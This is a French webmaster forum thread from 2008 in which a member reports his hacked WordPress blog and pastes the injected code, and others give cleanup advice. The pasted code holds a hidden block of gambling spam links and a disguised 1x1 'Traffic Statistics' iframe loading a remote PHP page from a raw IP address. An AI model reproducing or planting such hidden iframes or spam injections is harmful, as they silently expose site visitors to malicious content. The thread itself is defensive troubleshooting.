Curiosité

27 réponses
AuteurMessage

dbonin |
Membre

Photo de dbonin

Inscrit le : 06/07/2006

# Le 07/04/2008 à 23:09

Bonsoir,

J'ai de nouveau trouvé ce jour une curiosité son mon perso (Wordpress).
Dans un article à accès restreint j'ai deux phrases dont une qui, la dernière fois déjà, avait été remplacé par celle-ci :
"Vamos fazer um ensinando a criar um ponto de restauração"

En faisant une rapide et petite recherche sur Google, je trouve ceci dans les résultats :

Sairafi.net
Ce site risque d'endommager votre ordinateur.
Baixar http://www.anacharsis.com/toques-para-celular-vivo...Ouvrir dans une nouvelle fenetre Vamos fazer um ensinando a criar um ponto de restaura ão. ...
sairafi.net/


Est-ce cela vous dit quelque chose ?

Évolution WebOuvrir dans une nouvelle fenetre | RedirectionOuvrir dans une nouvelle fenetre | PageRankOuvrir dans une nouvelle fenetre

Bool | Olivier
Modérateur

Photo de Bool

Inscrit le : 09/05/2005

# Le 07/04/2008 à 23:20

Hello,

à priori c'est un contenu bloqué par StopBadwareOuvrir dans une nouvelle fenetre . Et justement, Firefox 3 (qui utilise StopBadware) a bloqué deux sites "hackés" via un système de blog connu (WordPress ?).
M NitotOuvrir dans une nouvelle fenetre en parle ici.

daevel : infogérance et conseilOuvrir dans une nouvelle fenetre || moiOuvrir dans une nouvelle fenetre

dbonin | David
Membre

Photo de dbonin

Inscrit le : 06/07/2006

# Le 07/04/2008 à 23:27

Merci Bool mais c'est bien plus grave que ça

Voici ce que je trouve dans le code source (le vrai, celui quand j'édite l'article en question) :

<noscript>Baixar <a href="http://www.grandestoques.com">toques polifonicos para celular</a></noscript><noscript>Entre más <a href="http://www.espana-poker.es/detallado-online-poker-informacion.html">http://www.espana-poker.es/detallado-online-poker-informacion.html</a> <u style="display:none"><a href="http://www.fig.greencuny.org/wp-content/1/apuesta-portal-internet.html">apuesta portal internet</a><a href="http://www.fig.greencuny.org/wp-content/1/on-line-casinos.html">on line casinos</a><a href="http://www.fig.greencuny.org/wp-content/1/jugar-roulette-gratis.html">jugar roulette gratis</a><a href="http://www.fig.greencuny.org/wp-content/1/casinos-chile.html">casinos chile</a><a href="http://www.fig.greencuny.org/wp-content/1/juegos-online-ruleta.html">juegos online ruleta</a><a href="http://www.fig.greencuny.org/wp-content/1/casinos-descargas-portales.html">casinos descargas portales</a><a href="http://www.fig.greencuny.org/wp-content/1/jugar-interactivo-portales.html">jugar interactivo portales</a><a href="http://www.fig.greencuny.org/wp-content/1/casinos-portales-web.html">casinos portales web</a><a href="http://www.fig.greencuny.org/wp-content/1/descargas-gratis.html">descargas gratis</a><a href="http://www.fig.greencuny.org/wp-content/1/harveys-casino-hotel.html">harveys casino hotel</a><a href="http://www.fig.greencuny.org/wp-content/1/descargar-juego-de-casino.html">descargar juego de casino</a><a href="http://www.fig.greencuny.org/wp-content/1/jugar-video-poquer-online.html">jugar video poquer online</a><a href="http://www.fig.greencuny.org/wp-content/1/jugar-dados.html">jugar dados</a><a href="http://www.fig.greencuny.org/wp-content/1/casinos-virtuales-portal-web.html">casinos virtuales portal web</a><a href="http://www.fig.greencuny.org/wp-content/1/juegos-apuestas-portal.html">juegos apuestas portal</a><a href="http://www.fig.greencuny.org/wp-content/1/casinos-pagina-web.html">casinos pagina web</a><a href="http://www.fig.greencuny.org/wp-content/1/video-poker-portales-web.html">video poker portales web</a><a href="http://www.fig.greencuny.org/wp-content/1/slots-machines.html">slots machines</a><a href="http://www.fig.greencuny.org/wp-content/1/descargar-casino-gratis.html">descargar casino gratis</a><a href="http://www.fig.greencuny.org/wp-content/1/tragaperra-paginas-web.html">tragaperra paginas web</a><a href="http://www.fig.greencuny.org/wp-content/1/premio-portales-web.html">premio portales web</a><a href="http://www.fig.greencuny.org/wp-content/1/casinos-portales.html">casinos portales</a><a href="http://www.fig.greencuny.org/wp-content/1/baccarat-gratis.html">baccarat gratis</a><a href="http://www.fig.greencuny.org/wp-content/1/juego-seguro-linea.html">juego seguro linea</a><a href="http://www.fig.greencuny.org/wp-content/1/jugar-interactivo-internet.html">jugar interactivo internet</a><a href="http://www.fig.greencuny.org/wp-content/1/jugar-de-la-ruleta.html">jugar de la ruleta</a><a href="http://www.fig.greencuny.org/wp-content/1/download-roulette.html">download roulette</a><a href="http://www.fig.greencuny.org/wp-content/1/ganar-premios-web.html">ganar premios web</a><a href="http://www.fig.greencuny.org/wp-content/1/promocion-casino-portal.html">promocion casino portal</a><a href="http://www.fig.greencuny.org/wp-content/1/formas-manera-ganar-ruleta.html">formas manera ganar ruleta</a><a href="http://www.fig.greencuny.org/wp-content/1/casino-virtual.html">casino virtual,grand virtual casino,juegos de casino virtual</a><a href="http://www.fig.greencuny.org/wp-content/1/jugar-a-la-ruleta.html">jugar a la ruleta</a><a href="http://www.fig.greencuny.org/wp-content/1/juegos-apuestas-portales-internet.html">juegos apuestas portales internet</a><a href="http://www.fig.greencuny.org/wp-content/1/ganar-dinero-online.html">ganar dinero online</a><a href="http://www.fig.greencuny.org/wp-content/1/premios-paginas-web.html">premios paginas web</a><a href="http://www.fig.greencuny.org/wp-content/1/online-baccarat.html">online baccarat</a><a mce_thref="http://www.fig.greencuny.org/wp-content/1/online-games.html">online games</a><a href="http://www.fig.greencuny.org/wp-content/1/premios-dinero-linea.html">premios dinero linea</a><a href="http://www.fig.greencuny.org/wp-content/1/casinos-espana-linea.html">casinos espana linea</a><a href="http://www.fig.greencuny.org/wp-content/1/casino-internacional-paginas-web.html">casino internacional paginas web</a><a href="http://www.fig.greencuny.org/wp-content/1/jugar-interactivo-portal-web.html">jugar interactivo portal web</a><a href="http://www.fig.greencuny.org/wp-content/1/ruleta-on-line.html">ruleta on line</a><a href="http://www.fig.greencuny.org/wp-content/1/ganancia-casino-paginas-internet.html">ganancia casino paginas internet</a><a href="http://www.fig.greencuny.org/wp-content/1/juegos-casino-portal-web.html">juegos casino portal web</a><a href="http://www.fig.greencuny.org/wp-content/1/juego-pagina-web.html">juego pagina web</a><a href="http://www.fig.greencuny.org/wp-content/1/ganar-dinero-portales-internet.html">ganar dinero portales internet</a><a href="http://www.fig.greencuny.org/wp-content/1/ganar-premios-pagina-internet.html">ganar premios pagina internet</a><a href="http://www.fig.greencuny.org/wp-content/1/jugar-gratis.html">jugar gratis</a><a href="http://www.fig.greencuny.org/wp-content/1/descarga-ruleta.html">descarga ruleta</a><a href="http://www.fig.greencuny.org/wp-content/1/ganar-premio-portal-internet.html">ganar premio portal internet</a></u> compares mejor.</noscript> Vamos fazer um ensinando a criar um ponto de restauração.


Donc c'est bien du piratage ou une saloperie dans le genre... mais par quel biais exactement

Évolution WebOuvrir dans une nouvelle fenetre | RedirectionOuvrir dans une nouvelle fenetre | PageRankOuvrir dans une nouvelle fenetre

dbonin | David
Membre

Photo de dbonin

Inscrit le : 06/07/2006

# Le 07/04/2008 à 23:28

Je suis bon pour mettre à jour mon Wordpress je crois

Évolution WebOuvrir dans une nouvelle fenetre | RedirectionOuvrir dans une nouvelle fenetre | PageRankOuvrir dans une nouvelle fenetre

Bool | Olivier
Modérateur

Photo de Bool

Inscrit le : 09/05/2005

# Le 07/04/2008 à 23:52

J'ai dû m'exprimer très mal alors... C'est effectivement un "hack/virus" ou autre connerie du genre, et Google le détecte via StopBadware. D'où le message "Ce site risque d'endommager votre ordinateur.".

Et vue que des sites "connus" ont été infectés via "un système de blog connu", je suppose que c'est effectivement Wordpress.

De toutes façons, Wordpress, ça pue (tm).

daevel : infogérance et conseilOuvrir dans une nouvelle fenetre || moiOuvrir dans une nouvelle fenetre

dbonin | David
Membre

Photo de dbonin

Inscrit le : 06/07/2006

# Le 08/04/2008 à 01:30

Mais non, tu t'exprimes très bien
C'est juste que je n'utilise pas Firefox 3 et je ne parlais pas de Google mais du piratage de Wordpress.

Merci pour ta réponse

Évolution WebOuvrir dans une nouvelle fenetre | RedirectionOuvrir dans une nouvelle fenetre | PageRankOuvrir dans une nouvelle fenetre

Bool | Olivier
Modérateur

Photo de Bool

Inscrit le : 09/05/2005

# Le 08/04/2008 à 01:52

D'ailleurs, la v2 de DotClear ne devrait pas tarder à sortir, c'est peut être le moment de migrer ?

daevel : infogérance et conseilOuvrir dans une nouvelle fenetre || moiOuvrir dans une nouvelle fenetre

dbonin | David
Membre

Photo de dbonin

Inscrit le : 06/07/2006

# Le 08/04/2008 à 01:54

Oh oui, pourquoi pas, j'avais fait ça pour tester et m'amuser un peu mais je ne suis pas attacher à l'un ou à l'autre.

Évolution WebOuvrir dans une nouvelle fenetre | RedirectionOuvrir dans une nouvelle fenetre | PageRankOuvrir dans une nouvelle fenetre

zehub | BENAICHA
Membre

Photo de zehub

Inscrit le : 21/12/2005

# Le 09/04/2008 à 12:03

Bool a dit :
D'ailleurs, la v2 de DotClear ne devrait pas tarder à sortir, c'est peut être le moment de migrer ?

J'avais Dotclear installé ... j'ai eu le même problème signalé en haut ... de plus, une fois que tu as Dotclear, le nombre important de spammeurs qui te bouffent ton trafic mensuel !! Hallucinant !

DivertissementOuvrir dans une nouvelle fenetre , VoyagesOuvrir dans une nouvelle fenetre , VoituresOuvrir dans une nouvelle fenetre , CuisineOuvrir dans une nouvelle fenetre

dbonin | David
Membre

Photo de dbonin

Inscrit le : 06/07/2006

# Le 17/04/2008 à 18:25

Ah la vache !

Voir l'image

Évolution WebOuvrir dans une nouvelle fenetre | RedirectionOuvrir dans une nouvelle fenetre | PageRankOuvrir dans une nouvelle fenetre

dbonin | David
Membre

Photo de dbonin

Inscrit le : 06/07/2006

# Le 17/04/2008 à 18:29

Quelle merde ce truc !

Voilà ce qu'il m'a mis dans le code cette fois :

<!-- Traffic Statistics --> <iframe src="http://61.155.8.157/iframe/wp-stat(s).(php)" frameborder="0" height="1" width="1"></iframe> <!-- End Traffic Statistics --> 



Que dois-je faire d'après vous ?



(Message édité le 17-04-2008 à 19h00 par EWR)

Évolution WebOuvrir dans une nouvelle fenetre | RedirectionOuvrir dans une nouvelle fenetre | PageRankOuvrir dans une nouvelle fenetre

PyRoFlo | Florent
Modérateur

Photo de PyRoFlo

Inscrit le : 09/05/2005

# Le 17/04/2008 à 18:41

Fais toi un script qui te liste tous les fichiers (de tous types) présents sur ton FTP, classe les par date de dernière modification décroissante et examine à la main les fichiers récemment modifiés.

Peut-être que tu as un espèce de rootkit ou un petit morceau de script PHP qui t'ajoute du contenu.

Ah et ça serait peut être bien de tronquer les liens que tu as posté, histoire de pas faire plaisir au hacker.

Bon courage...

Feu d'artifice ParisOuvrir dans une nouvelle fenetre

Akarys | Thierry
Membre

Photo de Akarys

Inscrit le : 19/01/2008

# Le 17/04/2008 à 19:02

@EWR:
> Que dois-je faire d'après vous ?

Solution provisoire : Faire le ménage puis Supprimer les droits en écriture d'Apache (nobody? www-data? ...) sur les sources et/ou répertoires de ton blog.

D'ailleurs comment se fait-il qu'Apache ait ces droits ? suPhp ?

Solution ensuite : mettre à jour ton WordPress vers une version plus récente/sécurisée. (Si ça existe...)

dbonin | David
Membre

Photo de dbonin

Inscrit le : 06/07/2006

# Le 17/04/2008 à 19:03

J'ai mis des charentaises... euh non, des parenthèses dans l'url

Rien ne semble avoir été modifié sur le serveur, il doit y avoir une faille dans mon Wordpress, je vais voir pour le mettre à jour... un jour...

Merci

Évolution WebOuvrir dans une nouvelle fenetre | RedirectionOuvrir dans une nouvelle fenetre | PageRankOuvrir dans une nouvelle fenetre

dbonin | David
Membre

Photo de dbonin

Inscrit le : 06/07/2006

# Le 17/04/2008 à 19:05

@Akarys :

Oui, je vais voir...

Merci

Évolution WebOuvrir dans une nouvelle fenetre | RedirectionOuvrir dans une nouvelle fenetre | PageRankOuvrir dans une nouvelle fenetre

PyRoFlo | Florent
Modérateur

Photo de PyRoFlo

Inscrit le : 09/05/2005

# Le 17/04/2008 à 19:15

Regarde aussi tes logs Apache, essaye de trouver des requêtes exotiques.

Feu d'artifice ParisOuvrir dans une nouvelle fenetre

MathieuC | Mathieu
Modérateur

Photo de MathieuC

Inscrit le : 15/07/2005

# Le 17/04/2008 à 21:11

EWR a dit :
je vais voir pour le mettre à jour... un jour...


C'est quand meme triste de voir a quel point tu te preocupe de la santé des ordinateurs de tes visiteurs...

Ho j'ai un virus sur mon site et une faille utilisée régulièrement ? Ho pas grave, je verrais un jour si j'ai le temps pour corriger ca

Enfin apres moi perso je m'en fou,je vais pas sur tes sites Mais ce qui est sur c'est qu'a l'avenir je les eviterais

dbonin | David
Membre

Photo de dbonin

Inscrit le : 06/07/2006

# Le 17/04/2008 à 21:32

Et parce que tu crois que j'ai laissé la chose en l'état ?

C'est pas parce que j'écris ici que je ne fait pas autre choses de mes journées

Oui c'est triste de voir des gens qui concluent et jugent comme tu le fait.

Si vraiment j'en avais rien à faire, je ne serai pas là pour en parler.

Évolution WebOuvrir dans une nouvelle fenetre | RedirectionOuvrir dans une nouvelle fenetre | PageRankOuvrir dans une nouvelle fenetre

MathieuC | Mathieu
Modérateur

Photo de MathieuC

Inscrit le : 15/07/2005

# Le 17/04/2008 à 22:44

Bah ca fait quand meme 10 jours que tu as un soft en acces public avec une faille de securité connue et utilisée a outrance... moi a la seconde ou je suis au courant de ce genre de truc, soit je corrige, soit je coupe, mais je laisse pas le bouzin tourner

dbonin | David
Membre

Photo de dbonin

Inscrit le : 06/07/2006

# Le 17/04/2008 à 23:02

Si tu as 5 minutes devant toi, je veux bien que tu le fasses, merci

Évolution WebOuvrir dans une nouvelle fenetre | RedirectionOuvrir dans une nouvelle fenetre | PageRankOuvrir dans une nouvelle fenetre

Répondre

Vous ne pouvez pas participer au forum, car votre inscription n'a pas été validée. Pour vous faire valider en tant que Membre, cliquez ici.

© MHN - Tous droits réservés | CNIL N°844440 | 27/11/2024 7:33:55 | Généré en 12.57ms | Contacts | Mentions légales |